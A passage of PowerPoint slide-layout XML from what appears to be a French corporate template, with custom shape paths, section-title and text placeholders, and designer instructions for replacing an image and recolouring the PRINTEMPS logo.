              <a:gd name="connsiteY13" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 2003545 w 5090160"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 1738214 w 5090160"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 509016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90160" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5090160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3719195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4747789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4987731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="5030435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5089114" y="5030435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5087876" y="5080986"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5040848" y="6038694"/>
                  <a:pt x="4273447" y="6807041"/>
                  <a:pt x="3316135" y="6855567"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6855774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003545" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1738214" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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14A0E432-770D-4C4F-BDC4-4EC7EA4C70CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765486" y="2666312"/>
            <a:ext cx="2543362" cy="341632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A74297-E316-40A6-81C7-C0C3A30F4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765486" y="3025127"/>
            <a:ext cx="2543362" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D06688B-E7C9-4966-A631-69BFB44401CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765486" y="5085420"/>
            <a:ext cx="2543362" cy="341632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FAA64E7-9AA9-44DF-9CE3-89536895490E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765486" y="5444235"/>
            <a:ext cx="2543362" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA701537-3E6B-4981-8BEE-53B1BF3B1579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8913800" y="2666312"/>
            <a:ext cx="2543362" cy="341632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9C3652-D076-4BFA-B520-D806BC1DF160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8913800" y="3025127"/>
            <a:ext cx="2543362" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F7FD563-1E6F-47F4-81A0-FB05CB2C1520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8913800" y="5085420"/>
            <a:ext cx="2543362" cy="341632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E393DCEC-6946-4963-B1AB-134029EC9472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8913800" y="5444235"/>
            <a:ext cx="2543362" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{457D7BC2-8B0A-4516-8D95-A61DF64AF830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700016" y="6457666"/>
            <a:ext cx="2623233"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4079E75D-AEF7-4A22-B352-E611BCE25E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Image 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD7EA23-7C61-4BC8-B524-4E5310D2A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29" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9270A226-E667-471D-B467-6B6FD60FF059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732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32" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A2E1A5-0462-43A6-9327-33D0063F71E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320"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6" name="Groupe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9914F4A7-7B1F-483D-B189-89250E31A371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="2451438"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="2451438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0923D6AF-B53C-465D-828F-D89D14157B49}"/>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4" name="Rectangle 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C126D7-7876-4D08-B39E-64CE4DC74018}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511520" y="2946559"/>
              <a:ext cx="1885826" cy="2092881"/>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To change the </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Gilroy Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>visual</a:t>
              </a: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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Supprimer le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Cliquez sur l'icône au centre du bloc gris</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Importer un visuel depuis votre ordinateur</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Sélectionnez le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Clic droit &gt; "arrière-plan"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Modifiez la couleur du logo PRINTEMPS (noir/blanc ou vert) en fonction de la luminosité de l'image sélectionnée </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Groupe 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFC7693-2C03-493F-BF6B-E5256F48CC34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132C48AE-0C1F-45F8-B44F-630C79969AEF}"/>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1" name="Rectangle 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E309C2F-26E8-4E34-9039-DC520E496C30}"/>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45" name="Groupe 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29846433-C31F-4892-A292-6935257F1E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="2588002"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="46" name="Groupe 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE488E0F-8282-458F-ADE7-16C695AB2541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495389B3-3534-4D13-9774-F679DCE823E7}"/>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0" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4064939-E588-4E11-B6D5-30D86989102F}"/>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47" name="Image 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA94D3D-2D6C-459A-9BFC-CF328E5BD951}"/>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8" name="Image 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F59843C-ED32-4661-A4BB-4287E6997200}"/>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80990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ict + Title + Subtitle + List">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Image 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B105132-C740-43F6-A34B-6A6B11DF03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37" name="Espace réservé pour une image  36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF4E86B-9E00-4211-9704-28C3ED86A413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5090160" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5090160"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY2" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY3" fmla="*/ 3719195 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY4" fmla="*/ 4747789 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY5" fmla="*/ 4951799 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY6" fmla="*/ 4951800 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY7" fmla="*/ 4987731 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 5090160 w 5090160"/>
              <a:gd name="connsiteY8" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 5089114 w 5090160"/>
              <a:gd name="connsiteY9" fmla="*/ 5030435 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 5087876 w 5090160"/>
              <a:gd name="connsiteY10" fmla="*/ 5080986 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 3316135 w 5090160"/>
              <a:gd name="connsiteY11" fmla="*/ 6855567 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 3307971 w 5090160"/>
              <a:gd name="connsiteY12" fmla="*/ 6855774 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 3307971 w 5090160"/>
              <a:gd name="connsiteY13" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 2003545 w 5090160"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 1738214 w 5090160"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 509016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090160" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5090160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3719195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4747789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4987731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="5030435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5089114" y="5030435"/>
